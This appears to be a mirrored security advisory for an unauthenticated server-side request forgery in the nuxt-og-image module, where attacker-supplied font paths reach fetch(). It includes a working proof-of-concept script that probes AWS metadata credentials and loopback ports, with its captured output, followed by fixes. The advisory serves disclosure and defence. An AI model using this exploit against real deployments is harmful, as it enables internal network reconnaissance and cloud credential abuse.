GHSA-q8hw-4fvp-9rwv: Input Validation

Published Sep 17, 2026
·
Updated

Summary nuxt-og-image exposes an unauthenticated HTTP endpoint at /og/d/ that base64url-decodes and JSON.parses a fonts URL segment, then passes each fonts[i].path value directly into fetch() server-side without any URL validation (no scheme allowlist, no loopback/RFC1918 block, no host allowlist, no DNS rebinding mitigation).

Under the module's documented default configuration (security.strict = false, security.secret = "", restrictRuntimeImagesToOrigin = false), any caller able to reach the deployed Nuxt site can force the Nuxt server to issue arbitrary outbound GET requests to any host reachable from the server - including loopback, RFC1918 LAN, and cloud metadata services (AWS IMDS, GCE/Azure metadata, Kubernetes kubelet, internal admin panels, Redis/etcd/Consul/Vault HTTP APIs).

The chain is blind (Satori consumes the response as font bytes and silently discards non-fonts) but a robust side-channel exists: the outer HTTP status is 500 when the SSRF target returns 2xx, and 200 when it fails or returns non-2xx. This is sufficient to (a) enumerate live internal services and open ports, (b) confirm IMDSv1 reachability, and (c) detect credential issuance on environments still allowing IMDSv1.

Demonstrated end-to-end on a stock npm create nuxt@latest install with the module's documented default usage.

Detail

Endpoint registration (unauthenticated)

The module registers /og/d/ and /og/s/ with no authentication / Origin check / Sec‑Fetch‑Site validation:

js // dist/shared/nuxt-og-image.DdbTs-xp.mjs : 5113-5133 addServerHandler({ route: "/og/d/", handler: resolve("./runtime/server/routes/image") }) addServerHandler({ route: "/og/s/", handler: resolve("./runtime/server/routes/image") })

Default security config (permissive)

js // dist/shared/nuxt-og-image.DdbTs-xp.mjs : 5618-5640 security: { strict: config.security?.strict ?? false, // <- gate disabled secret: config.security?.secret ?? process.env.NUXTOGIMAGESECRET ?? "", // ↑ no signature requirement restrictRuntimeImagesToOrigin: config.security?.restrictRuntimeImagesToOrigin ?? false, // ↑ inbound host allowlist disabled maxQueryParamSize: config.security?.maxQueryParamSize ?? null, renderTimeout: config.security?.renderTimeout ?? 15000, imageFetchTimeout: config.security?.imageFetchTimeout ?? 3000, }

The secret/signature branch is gated on secret && (truthy), so an empty string skips it entirely:

js // dist/runtime/server/og-image/context.js : 49-69 const secret = runtimeConfig.security?.secret let paramsSegment = encodedSegment if (secret && !import.meta.dev && !import.meta.prerender) { // signature enforcement happens HERE - but only if secret is non-empty. // Default install: secret === "" -> entire block skipped. }

Attacker-controlled deserialization of fonts

fonts is enumerated as a complex parameter: its value is base64url-decoded and then JSON.parsed straight into options:

js // dist/runtime/shared/urlEncoding.js : 65 const COMPLEXPARAMS = new Set(["satori","resvg","sharp","screenshot","takumi","fonts","query","path"])

// dist/runtime/shared/urlEncoding.js : 184-231 export function decodeOgImageParams(encoded) { ... for (const part of parts) { const idx = part.search(RESINGLEUNDERSCORE) if (idx === -1) continue const alias = part.slice(0, idx) let value = part.slice(idx + 1) const paramName = PARAMALIASES[alias] || alias if (COMPLEXPARAMS.has(paramName)) { try { const json = b64Decode(value) options[paramName] = JSON.parse(json) // <- attacker JSON survives unchanged } catch { options[paramName] = value } } ... } }

defu then merges attacker values into the request options:

js // dist/runtime/server/og-image/context.js : 135 options = defu(queryParams, urlOptions, ogImageRouteRules, runtimeConfig.defaults) // -> options.fonts = [{ name: "X", path: "<attacker-URL>", ... }]

From options.fonts to the unfettered fetch()

js // dist/runtime/server/og-image/satori/renderer.js : 36-42 const fonts = await loadFontsForRenderer(event, { ...options, fontDefs: options.fonts, // <- attacker array flows in })

// dist/runtime/server/og-image/fonts.js : 175-201 export async function loadDefinedFonts(event, fontDefs) { for (const def of fontDefs) { if (!def || typeof def !== "object" || !def.path) continue // <- only validation const fontConfig = { family: def.name, weight: def.weight||400, style: def.style, src: def.path, localPath: def.path } const data = await resolve(event.e, fontConfig).catch(() => null) ... } }

The production binding (selected for every non-dev / non-prerender preset - dist/shared/nuxt-og-image.DdbTs-xp.mjs:5445-5452):

js // dist/runtime/server/og-image/bindings/font-assets/node.js : 6-21 <- SINK export async function resolve(event, font) { const path = font.src || font.localPath // attacker-controlled const { app } = useRuntimeConfig() const fullPath = withBase(path, app.baseURL) // ufo.withBase returns absolute URLs unchanged const origin = getNitroOrigin(event) const timeout = getFetchTimeout(useOgImageRuntimeConfig()) // 3000 ms by default const res = await fetch( new URL(fullPath, origin).href, // <- when fullPath is absolute, { signal: AbortSignal.timeout(timeout) }, // origin is ignored ).catch(() => null) // -> fetch(attacker-URL) ... }

ufo.withBase("http://target/", "/") returns "http://target/" unchanged when the input is already an absolute URL; new URL(abs, origin) then yields the absolute URL. No URL.protocol check, no IP-literal block, no DNS-resolution-aware allowlist, no redirect cap.

Side-channel for blind exfiltration

Although the response body is consumed as font bytes and Satori discards non-font payloads, the outer HTTP status code differs deterministically based on the SSRF target's response:

| Target returns | Satori behavior | Outer response | |----------------|-----------------|----------------| | 2xx with non-font body | parseFont(bytes) throws | HTTP 500 | | Connection refused / timeout / non-2xx | fetch().catch(() => null) -> fallback fonts used | HTTP 200 (a PNG is returned) |

The boolean oracle (target alive & answered 2xx vs. not) is sufficient to:

- enumerate open ports on 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16 - detect cloud metadata reachability (and on legacy AWS IMDSv1, trigger credential issuance - even without read-back, the act of issuing credentials creates audit-trail and timing observables) - distinguish health-check responses, vault-init status, k8s kubelet /pods reachability, etc.

Steps To Reproduce

bash 1. Create a stock Nuxt 4 app and add the module npm create nuxt@latest lab-test --yes # accept defaults cd lab-test npm install nuxt-og-image # -> installs v6.6.0 (current latest)

nuxt.config.ts - the only change is enabling the module:

ts export default defineNuxtConfig({ compatibilityDate: '2025-07-15', modules: ['nuxt-og-image'], // NO ogImage.security overrides - accept module defaults. })

The module requires at least one OG image component to be registered (its documented Hello‑World; otherwise the endpoint returns 500 No OG Image components found). Add the minimal one:

bash mkdir -p app/components/OgImage cat > app/components/OgImage/Default.satori.vue <<'EOF' <script setup lang="ts"> defineProps<{ title?: string }>() </script> <template> <div style="display:flex;padding:32px;font-size:48px;background:#fff"> {{ title || 'Acme' }} </div> </template> EOF

Start a local sink to prove the SSRF (1 file)

ssrf-sink.mjs:

js import http from 'node:http' import fs from 'node:fs' const LOG = '/tmp/ssrf-sink.log'; fs.writeFileSync(LOG, '') http.createServer((req, res) => { const line = JSON.stringify({ ts: new Date().toISOString(), method: req.method, url: req.url, ua: req.headers['user-agent'], remote: req.socket.remoteAddress }) fs.appendFileSync(LOG, line + '\n'); console.log('HIT:', line) res.writeHead(200, { 'content-type': 'application/octet-stream' }).end('NOTAFONTBUT2XX') }).listen(9000, '127.0.0.1', () => console.log('sink ready 127.0.0.1:9000'))

bash node ssrf-sink.mjs & npm run dev # Nuxt on http://127.0.0.1:3000

Exploit script - one HTTP request, no auth (poc.mjs)

js const b64url = s => Buffer.from(s,'utf8').toString('base64') .replace(/=/g,'').replace(/\+/g,'-').replace(/\//g,'~')

// The entire attack: a single attacker-crafted GET. async function ssrf (attackerURL) { const seg = 'fonts' + b64url(JSON.stringify([{ name:'X', path: attackerURL }])) const url = http://127.0.0.1:3000/og/d/${seg}.png // <- unauth, no header const r = await fetch(url) console.log(SSRF target=${attackerURL} outer-status=${r.status}) }

await ssrf('http://127.0.0.1:9000/PWN?via=og-image') // sink - proves primitive await ssrf('http://169.254.169.254/latest/meta-data/iam/security-credentials/') // AWS IMDSv1 await ssrf('http://127.0.0.1:22/') // loopback port probe

Run

bash node poc.mjs

Observed result (captured during the actual lab run, 2026-06-23 10:52 UTC)

SSRF target=http://127.0.0.1:9000/PWN?via=og-image outer-status=500 SSRF target=http://169.254.169.254/latest/meta-data/iam/security-credentials/ outer-status=200 SSRF target=http://127.0.0.1:22/ outer-status=200

/tmp/ssrf-sink.log:

json {"ts":"2026-06-23T10:52:12.250Z","method":"GET","url":"/PWN?via=og-image","ua":"node","remote":"127.0.0.1"} {"ts":"2026-06-23T10:52:13.706Z","method":"GET","url":"/etc/passwd?or-any-path","ua":"node","remote":"127.0.0.1"}

The sink received GET requests with attacker-chosen paths, sourced from the Nuxt server process (user-agent: node is the undici/Node fetch fingerprint emitted by Nitro; remote: 127.0.0.1 is the Nuxt server itself on the lab host). No other process on the lab has any reason to call this address with these paths.

Reading the outer status codes back as the side-channel:

- outer-status=500 -> target answered 2xx (sink confirmed via log) - outer-status=200 -> target did not respond / non-2xx (IMDS unreachable from this host; :22 is SSH, not HTTP). Both cases prove the server-side fetch() was issued.

Impact

The vulnerability turns any deployed Nuxt site running nuxt-og-image (default config) into an unauthenticated SSRF relay into its own server-side network. Concrete impact varies by hosting environment:

Cloud (AWS / GCP / Azure)

- AWS EC2 with IMDSv1 still allowed: fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>') triggers credential issuance to the role attached to the instance. Even though the response body is not echoed back to the attacker, the call is performed in the instance's network identity and shows up in CloudTrail; in environments with permissive role policies + persistence (e.g. a backup S3 listing) the attacker can chain via the side-channel into role exfil through other ingress points. (Industry surveys repeatedly show 20-40 % of EC2 fleets still have IMDSv1 enabled.) - GCE / Azure: metadata is gated on a custom header that fetch does not add -> metadata read prevented, but internal Google/Azure network reach is still proven. - EKS / GKE / AKS: http://kubernetes.default.svc.cluster.local/api/... is reachable, as are kube-proxy localhost ports, kubelet on :10250 (status-only readable via side-channel), and per-pod sidecar admin APIs.

Self-hosted / on-prem

- Internal admin panels (Grafana, Kibana, Prometheus, Argo, Jenkins, Sentry, Hashicorp Vault /v1/sys/health, Consul /v1/agent/self) become enumerable. Status-code side-channel reveals init/seal state of Vault, leadership of Consul, etc. - Localhost-bound services intended as "developer-only" (e.g. a debug Redis on 127.0.0.1:6379, an embedded SQL admin UI on 127.0.0.1:8080, an internal feature-flag server) become enumerable from the public Internet. - Egress controls bypass: if the Nuxt deployment is on an allowlist VLAN that may reach payments-internal while end users may not, the attacker can probe that VLAN through the relay.

Generic

- Port scanning of LAN ranges through the deployed site (timing+status side-channel). - Long-lived DoS amplifier: each request holds a render worker for up to imageFetchTimeout (3 s default). 100 concurrent requests to slow-responding internal targets hold all OG workers; coupled with renderTimeout (15 s) the OG image rendering capacity is exhausted with very low attacker bandwidth. - Side-channel exfil with reflectable bytes: where an internal HTTP response contains data that happens to render through Satori's glyph fallback path (e.g. plain ASCII status-page text), bytes can leak into the rendered PNG as visual noise - an opportunistic read primitive.

Fix

Short-term (must-have before next release)

In dist/runtime/server/og-image/bindings/font-assets/node.js, validate the URL before issuing fetch:

diff + import { isPrivateAddress } from '../../util/isPrivateAddress.js' // new helper, see below

export async function resolve(event, font) { const path = font.src || font.localPath const { app } = useRuntimeConfig() const fullPath = withBase(path, app.baseURL) const origin = getNitroOrigin(event) + + const target = new URL(fullPath, origin) + + // (1) Scheme allowlist + if (target.protocol !== 'http:' && target.protocol !== 'https:') { + throw createError({ statusCode: 400, statusMessage: '[og-image] Disallowed font URL scheme' }) + } + + // (2) Same-origin OR explicit user allowlist + const allowlist = useOgImageRuntimeConfig().security?.fontHostAllowlist ?? [] + const sameOrigin = target.origin === new URL(origin).origin + if (!sameOrigin && !allowlist.includes(target.host)) { + throw createError({ statusCode: 400, statusMessage: '[og-image] Font host not in allowlist' }) + } + + // (3) Block private / loopback / link-local at lookup time (DNS-rebinding-safe) + if (await isPrivateAddress(target.hostname)) { + throw createError({ statusCode: 400, statusMessage: '[og-image] Private network not allowed' }) + } + const timeout = getFetchTimeout(useOgImageRuntimeConfig()) const res = await fetch(target.href, { signal: AbortSignal.timeout(timeout), + redirect: 'manual', // do not follow redirects across the gate }).catch(() => null) if (res?.ok) return Buffer.from(await res.arrayBuffer()) ... }

isPrivateAddress(host) should resolve the host via DNS (caching) and reject if any resolved address is in 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16, ::1, fc00::/7, fe80::/10. The resolved address must then be pinned and passed into fetch (or undici's lookup option) so the TCP connection cannot rebound to a different IP after the check (TOCTOU / DNS rebinding defense).

Apply the same validator in dist/runtime/server/og-image/bindings/font-assets/dev-prerender.js.

Flip the security defaults (medium-term)

diff - strict: config.security?.strict ?? false, + strict: config.security?.strict ?? true,

- restrictRuntimeImagesToOrigin: config.security?.restrictRuntimeImagesToOrigin ?? false, + restrictRuntimeImagesToOrigin: config.security?.restrictRuntimeImagesToOrigin ?? true,

When strict is true, the runtime should refuse to start with secret === '' and emit a clear error pointing to the docs (similar to how Nuxt itself errors when runtimeConfig secrets are unset in production).

Defense in depth (long-term)

- Validate fonts[] shape at decode time in decodeOgImageParams. Reject any fonts[i].path that is not a relative path or in the allowlist. - Tighten COMPLEXPARAMS: every JSON-parsed key (satori, resvg, sharp, screenshot, takumi, fonts) must have a schema validator. Today they are blind-trusted across the URL boundary. - Document nuxt-og-image's threat model explicitly: which URL parameters are attacker-controlled by design, which runtimeConfig keys must be set in production, which defaults are unsafe.

Affected Software

1 affected componentFixes available
npm/nuxt-og-image>=6.0.2<6.7.0
6.7.0

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade npm/nuxt-og-image to a version that resolves this vulnerability.

    Fixed in 6.7.0
  2. Configuration

    Set `security.restrictRuntimeImagesToOrigin` so runtime images (including `options.fonts` fetch targets) are restricted to origin; in the provided diff it is `restrictRuntimeImagesToOrigin: config.security?.restrictRuntimeImagesToOrigin ??` and the module default shown is `restrictRuntimeImagesToOrigin = false` (unsafe).

    nuxt-og-image runtime config (config.security) restrictRuntimeImagesToOrigin = true
  3. Configuration

    Enable `security.strict = true` so the runtime refuses to start with `secret === ''` and emits a clear error (text: strict should refuse to start when `secret === ''`). The provided material notes defaults are `security.strict = false` (unsafe) and `security.secret = ""`.

    nuxt-og-image runtime config (config.security) strict = true
  4. Configuration

    Set `security.secret` to a non-empty value. The material states signature enforcement happens only when `secret &&` (truthy), and the vulnerable default is `secret === ""` which skips the security branch entirely.

    nuxt-og-image runtime config (config.security) secret = (non-empty; do not leave empty)
  5. Configuration

    Before issuing `fetch` for `fonts[*].path` in `dist/runtime/server/og-image/bindings/font-assets/node.js` (sink at lines noted in the material), validate and restrict the URL: check protocol scheme (allow only `http:` and `https:`), enforce same-origin OR explicit `security.fontHostAllowlist` host allowlist, block private/loopback/link-local addresses using `isPrivateAddress(target.hostname)`, and cap redirect behavior (diff shows `redirect: 'manual'` with 400 errors for disallowed schemes/hosts/private networks). Also pin the resolved address/connection so TCP cannot rebound after the check (TOCTOU/DNS rebinding defense).

    nuxt-og-image font URL validation (dist/runtime/server/og-image/bindings/font-assets/node.js) URL fetch allow/deny checks = enforce scheme allowlist + host allowlist + block private/loopback/link-local + DNS-rebinding-safe pinning
  6. Configuration

    Tighten `COMPLEX_PARAMS` so every JSON-parsed key (`satori`, `resvg`, `sharp`, `screenshot`, `takumi`, `fonts`) has a schema validator; validate `fonts[*]` shape at decode time in `decodeOgImageParams` (material explicitly calls out `Validate fonts[*] shape at decode time in decodeOgImageParams`).

    nuxt-og-image input parameter validation (decodeOgImageParams / COMLEX_PARAMS) COMPLEX_PARAMS validation + fonts schema validation = validate every JSON-parsed complex key including `fonts[*]` shape

Event History

Sep 17, 2026
Advisory Published
via GitHub·02:48 PM
Data Sourced
via GitHub·02:48 PM
DescriptionWeaknessAffected Software

Frequently Asked Questions

1

Which deployments are exposed by default?

Deployments using the documented defaults are affected: security.strict is false, security.secret is empty, and restrictRuntimeImagesToOrigin is false. Any caller that can reach the Nuxt site can access the unauthenticated endpoint.

2

What access does an attacker need to exploit this issue?

The attacker only needs HTTP access to the deployed Nuxt application. They do not need authentication, and can cause the server to make GET requests to hosts reachable from the server, including loopback, RFC1918 networks, and cloud metadata services.

3

Can an attacker observe the result of internal requests?

The request is blind because fetched responses are consumed as font bytes. However, the outer response provides a side channel: a 500 status indicates the target returned 2xx, while 200 indicates failure or a non-2xx response.

4

How can I assess whether internal services may have been probed?

Review requests to the /_og/d/ endpoint, particularly inputs containing base64url-encoded JSON font definitions. Also review application and network egress logs for server-originated GET requests to loopback, RFC1918, metadata-service, or other internal addresses.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203